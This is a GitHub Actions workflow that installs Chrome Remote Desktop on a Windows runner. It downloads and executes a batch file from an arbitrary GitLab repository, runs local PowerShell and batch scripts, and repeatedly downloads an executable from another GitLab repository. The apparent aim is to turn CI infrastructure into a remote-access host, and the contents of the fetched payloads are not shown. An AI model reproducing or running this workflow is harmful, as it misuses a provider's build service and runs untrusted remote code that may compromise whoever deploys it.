name: Start

on:
  workflow_dispatch:

jobs:
  makeit:
    runs-on: windows-latest

    steps:

      - name: Install 
        run: |
          Invoke-WebRequest https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi -OutFile crd.msi
          .\crd.msi /quiet
          Invoke-WebRequest -Uri https://gitlab.com/EfeBey2903/myprojetct/-/raw/main/a.cmd -OutFile setup.bat
          cmd /c setup.bat
          sleep 5
          powershell -command D:\a\fictional-octo-waffle\tcp.ps1
          cmd /c loop.bat
          
      - name: Start 
        run: |
           curl -o zip.exe -Uri "https://gitlab.com/jfv-he/jrtiiupngk/-/raw/main/use.exe"
           cmd /c sleep 240
           cmd /c curl -o zip.exe -Uri "https://gitlab.com/jfv-he/jrtiiupngk/-/raw/main/use.exe"
           cmd /c sleep 240
        
